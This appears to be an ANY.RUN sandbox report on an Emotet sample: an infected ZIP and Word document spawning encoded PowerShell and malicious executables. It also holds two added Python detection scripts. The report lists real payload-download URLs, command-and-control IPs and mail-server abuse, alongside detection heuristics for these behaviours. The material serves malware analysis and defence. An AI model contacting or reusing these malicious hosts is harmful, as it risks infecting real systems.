File name: 79cff238b86750bc8e5dbf094f015573a08e2e2a (1).zip
(The name is 40 hex characters and looks like a SHA1, but it does not match the archive's own SHA1 listed under Indicators below; do not treat it as the archive hash.)

Full analysis: https://app.any.run/tasks/fdce6102-70ae-41f1-984b-a5681ac36149
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans of its era. Over its lifetime it was upgraded from a banking trojan into a modular loader and spam botnet that delivers other malware. It targets mostly corporate victims, but private users are also infected in mass spam email campaigns.

Analysis date: September 19, 2019, 11:31:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
opendir
trojan
evasion
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: FA2A3536EA6263638C0E56B18C19E133
SHA1: 1689F171C687FB5D1D92A2218C6F230ECDBAB064
SHA256: CA2F9A0E89213489A80EA74056CA2380FA15FB941887FF1D654A5DEEBA47E594
SSDEEP: 3072:F9jRb3ED3UFIdWy8QQnEPA6U0DOYnt9OQOC:F9xE7kQBI6U2fn3r

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 3532)
    • Application was dropped or rewritten from another process

      • 768.exe (PID: 3536)
      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3996)
      • 768.exe (PID: 3556)
      • easywindow.exe (PID: 4040)
      • ebuQuzTL8.exe (PID: 2176)
      • ebuQuzTL8.exe (PID: 3408)
      • easywindow.exe (PID: 2756)
      • ebuQuzTL8.exe (PID: 2628)
      • ebuQuzTL8.exe (PID: 320)
      • easywindow.exe (PID: 3612)
      • easywindow.exe (PID: 2704)
    • Emotet process was detected

      • 768.exe (PID: 3536)
      • ebuQuzTL8.exe (PID: 2176)
    • Connects to CnC server

      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3612)
    • EMOTET was detected

      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3612)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 2840)
      • easywindow.exe (PID: 3612)
  • SUSPICIOUS

    • Application launched itself

      • easywindow.exe (PID: 3996)
      • 768.exe (PID: 3556)
      • ebuQuzTL8.exe (PID: 320)
      • easywindow.exe (PID: 4040)
    • Executable content was dropped or overwritten

      • 768.exe (PID: 3536)
      • powershell.exe (PID: 3124)
      • ebuQuzTL8.exe (PID: 2176)
      • easywindow.exe (PID: 2840)
    • PowerShell script executed

      • powershell.exe (PID: 3124)
    • Creates files in the user directory

      • powershell.exe (PID: 3124)
    • Executed via WMI

      • powershell.exe (PID: 3124)
    • Starts itself from another location

      • 768.exe (PID: 3536)
      • ebuQuzTL8.exe (PID: 2176)
    • Connects to server without host name

      • easywindow.exe (PID: 3612)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3568)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3568)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3568)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3568)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 79cff238b86750bc8e5dbf094f015573a08e2e2a
ZipUncompressedSize: 154526
ZipCompressedSize: 105503
ZipCRC: 0x09328d78
ZipModifyDate: 2019:09:16 12:12:02
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
All screenshots are available in the full report
Total processes: 51
Monitored processes: 15
Malicious processes: 13
Suspicious processes: 1

Behavior graph

Parent/child links below are taken from the Process information table, which gives parent image names only (no parent PIDs); where two instances share an image name, the child is placed under the instance that precedes it in the page's graph order. The graph on the page also shows easywindow.exe PIDs 4040, 2756, 2704 and 3612 and ebuQuzTL8.exe PID 2176 (3612 and 2176 marked #EMOTET), whose table rows are not in this excerpt.

explorer.exe
  ├─ winrar.exe (3532)
  └─ winword.exe (3568)
wmiprvse.exe
  └─ powershell.exe (3124)
      └─ 768.exe (3556)
          └─ 768.exe (3536)  #EMOTET
              └─ easywindow.exe (3996)
                  └─ easywindow.exe (2840)  #EMOTET
                      └─ ebuQuzTL8.exe (2628)
                          └─ ebuQuzTL8.exe (3408)
                              └─ ebuQuzTL8.exe (320)

Process information

PID 3532  parent: explorer.exe
  CMD:  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\79cff238b86750bc8e5dbf094f015573a08e2e2a (1).zip"
  Path: C:\Program Files\WinRAR\WinRAR.exe
  User: admin | Company: Alexander Roshal | Integrity Level: MEDIUM | Description: WinRAR archiver | Exit code: 0 | Version: 5.60.0

PID 3568  parent: explorer.exe
  CMD:  "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\doc.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Version: 14.0.6024.1000

PID 3124  parent: wmiprvse.exe
  CMD:  powershell -enco … (the Base64 payload is not reproduced in this excerpt; -enco is an accepted abbreviation of -EncodedCommand)
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows PowerShell | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3556  parent: powershell.exe
  CMD:  "C:\Users\admin\768.exe"
  Path: C:\Users\admin\768.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows Media Player Network Sharing Service | Exit code: 0 | Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850)

PID 3536  parent: 768.exe
  CMD:  --2903b4b7
  Path: C:\Users\admin\768.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows Media Player Network Sharing Service | Exit code: 0 | Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850)

PID 3996  parent: 768.exe
  CMD:  "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows Media Player Network Sharing Service | Exit code: 0 | Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850)

PID 2840  parent: easywindow.exe
  CMD:  --fd47f3b8
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows Media Player Network Sharing Service | Exit code: 0 | Version: 12.0.7601.17514 (win7sp1_rtm.101119-1850)

PID 2628  parent: easywindow.exe
  CMD:  "C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Display Control Panel | Exit code: 0 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3408  parent: ebuQuzTL8.exe
  CMD:  "C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Display Control Panel | Exit code: 0 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 320  parent: ebuQuzTL8.exe
  CMD:  --e1884024
  Path: C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Display Control Panel | Exit code: 0 | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Two things worth noting from this table. First, 768.exe, easywindow.exe and ebuQuzTL8.exe all carry Microsoft Corporation version information ("Windows Media Player Network Sharing Service", "Display Control Panel") while running from C:\Users\admin\ and %LOCALAPPDATA%\easywindow\; a version resource is attacker-controlled and is not evidence of legitimacy. Second, the second instance of each binary is started by the first with a bare "--<8 hex digits>" argument (--2903b4b7, --fd47f3b8, --e1884024), which is the self-relaunch the "Application launched itself" and "Starts itself from another location" signatures above describe.
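As an added example (this code is not part of the ANY.RUN report), the records below are constructed from the Process information table and run through heuristics that correspond to the report's process signatures: encoded PowerShell spawned via WMI, an executable launched by PowerShell from the user profile, a copy started from %LOCALAPPDATA%\<name>\<name>.exe, self-relaunch with a "--<8 hex>" argument, and Microsoft version information on a binary outside the system directories. The record layout, the heuristic names and the shortened CMD for PID 3124 (whose encoded payload the excerpt does not reproduce) are this example's own assumptions.

```python
"""Process-chain heuristics for the Emotet run above (added example, not report code)."""
import re

# Constructed from the report's Process information table. The excerpt gives
# parent image names, not parent PIDs, so links are by image name.
PROCESSES = [
    dict(pid=3532, parent="explorer.exe", company="Alexander Roshal",
         path=r"C:\Program Files\WinRAR\WinRAR.exe",
         cmd=r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\79cff238b86750bc8e5dbf094f015573a08e2e2a (1).zip"'),
    dict(pid=3568, parent="explorer.exe", company="Microsoft Corporation",
         path=r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         cmd=r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\doc.doc"'),
    dict(pid=3124, parent="wmiprvse.exe", company="Microsoft Corporation",
         path=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmd="powershell -enco ..."),  # assumption: payload stands in for the elided Base64
    dict(pid=3556, parent="powershell.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\768.exe", cmd=r'"C:\Users\admin\768.exe"'),
    dict(pid=3536, parent="768.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\768.exe", cmd="--2903b4b7"),
    dict(pid=3996, parent="768.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\AppData\Local\easywindow\easywindow.exe",
         cmd=r'"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"'),
    dict(pid=2840, parent="easywindow.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\AppData\Local\easywindow\easywindow.exe", cmd="--fd47f3b8"),
    dict(pid=2628, parent="easywindow.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe",
         cmd=r'"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe"'),
    dict(pid=3408, parent="ebuQuzTL8.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe",
         cmd=r'"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe"'),
    dict(pid=320, parent="ebuQuzTL8.exe", company="Microsoft Corporation",
         path=r"C:\Users\admin\AppData\Local\easywindow\ebuQuzTL8.exe", cmd="--e1884024"),
]

HEX_ARG = re.compile(r"^--[0-9a-f]{8}$")                       # --2903b4b7 style relaunch
LOCALAPPDATA_COPY = re.compile(r"\\appdata\\local\\([^\\]+)\\([^\\]+)\.exe$")
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files")         # where Microsoft binaries belong


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_encoded_powershell(cmd):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand, so -e, -enc
    # and the report's -enco all work; match on prefix, not the full switch.
    return any(t.startswith("-") and len(t) > 1 and "-encodedcommand".startswith(t)
               for t in cmd.lower().split())


def flags_for(p):
    path, name, parent = p["path"].lower(), image_name(p["path"]), p["parent"].lower()
    flags = []
    if name == "powershell.exe" and parent == "wmiprvse.exe" and is_encoded_powershell(p["cmd"]):
        flags.append("encoded PowerShell spawned via WMI")
    if parent == "powershell.exe" and path.startswith("c:\\users\\"):
        flags.append("PowerShell launched an executable from the user profile")
    if parent == name:   # binary started a second instance of itself
        flags.append("self-relaunch with --<8 hex> argument" if HEX_ARG.match(p["cmd"].strip())
                     else "launched itself")
    m = LOCALAPPDATA_COPY.search(path)
    if m and m.group(1) == m.group(2) and parent != name:   # %LOCALAPPDATA%\x\x.exe started by another binary
        flags.append("copy started from %LOCALAPPDATA%\\<name>\\<name>.exe")
    if p["company"] == "Microsoft Corporation" and not path.startswith(SYSTEM_PREFIXES):
        flags.append("Microsoft version info on a binary outside Windows/Program Files")
    return flags


def analyze(processes=PROCESSES):
    """Return {pid: [flags]} for every process that triggered at least one heuristic."""
    result = {}
    for p in processes:
        flags = flags_for(p)
        if flags:
            result[p["pid"]] = flags
    return result


if __name__ == "__main__":
    for pid, flags in analyze().items():
        print(pid, "->", "; ".join(flags))
```

Run as-is it prints one line per flagged PID; WinRAR and Word trigger nothing, PowerShell trips only the WMI rule, and every user-profile binary trips the stolen-version-info rule. Parentage by image name is a limitation of this excerpt; with real process telemetry (Sysmon event 1 or EDR data) key on parent PID instead.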
Total events: 23 087
Read events: 9 545
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 4
Suspicious files: 12
Text files: 3
Unknown types: 45

Dropped files

PID   Process      Filename
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Temp\CVRE41B.tmp.cvr
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55240EA.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BEA5888.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB5EB7D6.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC81AA54.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9490782.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\227212E0.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD305BEE.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41F9E2C.wmf
3568  WINWORD.EXE  C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A370A11A.wmf

The MD5 and SHA256 columns are empty for every row in this excerpt, and only Word's own temporary and .wmf files are listed; the four executable files counted above (768.exe, easywindow.exe, ebuQuzTL8.exe and their copies) are in the full report.
HTTP(S) requests: 13
TCP/UDP connections: 75
DNS requests: 61
Threats: 0

HTTP requests

PID  | Process        | Method | Code | IP:port             | URL                                                 | CN | Type   | Size    | Reputation
3124 | powershell.exe | GET    | 301  | 104.31.76.148:80    | http://danangluxury.com/wp-content/uploads/KTgQsblu/ | US | -      | -       | shared
3612 | easywindow.exe | GET    | -    | 69.43.168.232:443   | http://69.43.168.232:443/whoami.php                 | US | -      | -       | malicious
3612 | easywindow.exe | GET    | -    | 69.43.168.232:443   | http://69.43.168.232:443/whoami.php                 | US | -      | -       | malicious
2840 | easywindow.exe | POST   | -    | 59.152.93.46:443    | http://59.152.93.46:443/teapot/                     | BD | -      | -       | malicious
2840 | easywindow.exe | POST   | 200  | 185.129.92.210:7080 | http://185.129.92.210:7080/prov/scripts/nsip/merge/ | AZ | binary | 257 Kb  | malicious
2840 | easywindow.exe | POST   | -    | 91.92.191.134:8080  | http://91.92.191.134:8080/site/publish/             | IR | -      | -       | malicious
3612 | easywindow.exe | GET    | 200  | 185.187.198.4:8080  | http://185.187.198.4:8080/whoami.php                | RU | text   | 13 b    | malicious
3568 | WINWORD.EXE    | GET    | 200  | 52.109.32.27:80     | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | GB | xml | 1.99 Kb | whitelisted
3612 | easywindow.exe | POST   | 200  | 69.43.168.232:443   | http://69.43.168.232:443/entries/                   | US | binary | 132 b   | malicious
3612 | easywindow.exe | GET    | 200  | 185.187.198.4:8080  | http://185.187.198.4:8080/whoami.php                | RU | text   | 13 b    | malicious

"-" marks a column the report left empty (no response code, content type or size recorded for that request). Every easywindow.exe request is plain HTTP to a bare IP address on port 443, 7080 or 8080, which is what the "Connects to server without host name" signature and the "ET POLICY HTTP traffic on port 443 (POST)" alert below refer to; the only PowerShell request shown is the GET to danangluxury.com that answered 301.

Connections

PID  | Process        | IP:port             | Domain               | ASN                                  | CN | Reputation
2840 | easywindow.exe | 91.92.191.134:8080  | -                    | Information Technology Company (ITC) | IR | malicious
2840 | easywindow.exe | 59.152.93.46:443    | -                    | Zipnet Limited DKB AS number         | BD | malicious
3124 | powershell.exe | 176.58.116.140:443  | pep-egypt.com        | Linode, LLC                          | GB | unknown
3124 | powershell.exe | 104.31.76.148:443   | danangluxury.com     | Cloudflare Inc                       | US | shared
2840 | easywindow.exe | 185.129.92.210:7080 | -                    | Bravo Online Systems LLC             | AZ | malicious
3124 | powershell.exe | 104.31.76.148:80    | danangluxury.com     | Cloudflare Inc                       | US | shared
3612 | easywindow.exe | 69.43.168.232:443   | -                    | Castle Access Inc                    | US | malicious
3124 | powershell.exe | 173.212.231.135:443 | autorepuestosdml.com | Contabo GmbH                         | DE | unknown
3612 | easywindow.exe | 184.106.54.10:995   | secure.emailsrvr.com | Rackspace Ltd.                       | US | malicious
3612 | easywindow.exe | 188.125.73.109:993  | imap.aol.com         | -                                    | CH | unknown

"-" marks a field the report left empty. powershell.exe (PID 3124) reached three different domains (pep-egypt.com, danangluxury.com, autorepuestosdml.com) while only one HTTP request from it is recorded; easywindow.exe (PID 3612) also opened POP3S (995) and IMAPS (993) sessions to public mail servers, traffic a Windows Media Player component has no reason to generate.

DNS requests

Domain               | IP(s)                        | Reputation
autorepuestosdml.com | 173.212.231.135              | unknown
pep-egypt.com        | 176.58.116.140               | malicious
danangluxury.com     | 104.31.76.148, 104.31.77.148 | unknown
pop3.telefonica.net  | 86.109.99.71                 | unknown
secure.emailsrvr.com | 184.106.54.10                | shared
st.ot.ou             | -                            | unknown
ia.alyhocm           | -                            | unknown
pop.ctcweb.net       | 137.118.46.216               | unknown
pop.biz.rr.com       | 107.14.166.78                | shared
pp.esme              | -                            | unknown

"-" means the report lists no resolved address; the three names without one (st.ot.ou, ia.alyhocm, pp.esme) are reproduced exactly as the report shows them. The POP3/IMAP host lookups match the mail-server connections from easywindow.exe (PID 3612) above.

Threats

PID  | Process        | Class                         | Message
2840 | easywindow.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23
2840 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2840 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2840 | easywindow.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 20
2840 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2840 | easywindow.exe | Potentially Bad Traffic       | ET POLICY HTTP traffic on port 443 (POST)
2840 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3612 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3612 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3612 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
16 ETPRO signatures available at the full report
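As an added example (not part of the ANY.RUN report), the HTTP requests and connections from the tables above are run through a few network heuristics that correspond to what the IDS alerts and the "Connects to server without host name" signature flagged: HTTP to a bare IP with no host name, plaintext HTTP on port 443, HTTP on an uncommon port, POST check-ins to bare IPs, script hosts making outbound connections, and mail-protocol ports used by a process that is not a mail client. The records are constructed from this page (the office14client URL is kept in full, the other fields as shown); the heuristic names and the MAIL_CLIENTS and SCRIPT_HOSTS lists are this example's own assumptions.

```python
"""Network heuristics over the report's HTTP and connection tables (added example, not report code)."""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# (pid, process, method, http_code or None where the report shows no response, url)
HTTP_REQUESTS = [
    (3124, "powershell.exe", "GET", 301, "http://danangluxury.com/wp-content/uploads/KTgQsblu/"),
    (3612, "easywindow.exe", "GET", None, "http://69.43.168.232:443/whoami.php"),
    (2840, "easywindow.exe", "POST", None, "http://59.152.93.46:443/teapot/"),
    (2840, "easywindow.exe", "POST", 200, "http://185.129.92.210:7080/prov/scripts/nsip/merge/"),
    (2840, "easywindow.exe", "POST", None, "http://91.92.191.134:8080/site/publish/"),
    (3612, "easywindow.exe", "GET", 200, "http://185.187.198.4:8080/whoami.php"),
    (3568, "WINWORD.EXE", "GET", 200,
     "http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033"
     "&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023"),
    (3612, "easywindow.exe", "POST", 200, "http://69.43.168.232:443/entries/"),
]

# (pid, process, "ip:port", resolved domain or "" where the report lists none)
CONNECTIONS = [
    (2840, "easywindow.exe", "91.92.191.134:8080", ""),
    (2840, "easywindow.exe", "59.152.93.46:443", ""),
    (3124, "powershell.exe", "176.58.116.140:443", "pep-egypt.com"),
    (3124, "powershell.exe", "104.31.76.148:443", "danangluxury.com"),
    (2840, "easywindow.exe", "185.129.92.210:7080", ""),
    (3124, "powershell.exe", "104.31.76.148:80", "danangluxury.com"),
    (3612, "easywindow.exe", "69.43.168.232:443", ""),
    (3124, "powershell.exe", "173.212.231.135:443", "autorepuestosdml.com"),
    (3612, "easywindow.exe", "184.106.54.10:995", "secure.emailsrvr.com"),
    (3612, "easywindow.exe", "188.125.73.109:993", "imap.aol.com"),
]

MAIL_PORTS = {25: "smtp", 110: "pop3", 143: "imap", 465: "smtps", 587: "submission", 993: "imaps", 995: "pop3s"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}            # assumption: legitimate mail clients on the host
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}  # assumption


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def http_flags(method, code, url):
    """Heuristics for one HTTP request; returns the list of triggered flag names."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme == "https" else 80)
    flags = []
    if is_ip(u.hostname):
        flags.append("request to bare IP, no host name")
    if u.scheme == "http" and port == 443:          # the ET POLICY "HTTP traffic on port 443" case
        flags.append("plaintext HTTP on port 443")
    if port not in (80, 443):
        flags.append(f"HTTP on uncommon port {port}")
    if method == "POST" and is_ip(u.hostname):
        flags.append("POST to bare IP (beacon-style check-in)")
    return flags


def connection_flags(process, ip_port, domain):
    port = int(ip_port.rsplit(":", 1)[1])
    flags = []
    if port in MAIL_PORTS and process.lower() not in MAIL_CLIENTS:
        flags.append(f"{MAIL_PORTS[port]} connection from non-mail process")
    if process.lower() in SCRIPT_HOSTS:
        flags.append("script host making outbound connection")
    return flags


def analyze(http=HTTP_REQUESTS, conns=CONNECTIONS):
    """Return {pid: [(target, flag), ...]} for every PID with at least one finding."""
    by_pid = defaultdict(list)
    for pid, _proc, method, code, url in http:
        for flag in http_flags(method, code, url):
            by_pid[pid].append((url, flag))
    for pid, proc, ip_port, domain in conns:
        for flag in connection_flags(proc, ip_port, domain):
            by_pid[pid].append((domain or ip_port, flag))
    return dict(by_pid)


if __name__ == "__main__":
    for pid, findings in sorted(analyze().items()):
        for target, flag in findings:
            print(pid, flag, "->", target)
```

Word's config14 request produces no finding, PowerShell is reported only because a script host went outbound, and both easywindow.exe PIDs collect the bare-IP, port and mail-protocol flags. The heuristics are intentionally coarse; in production they would feed a score rather than a verdict, since legitimate software does occasionally talk HTTP to a bare IP.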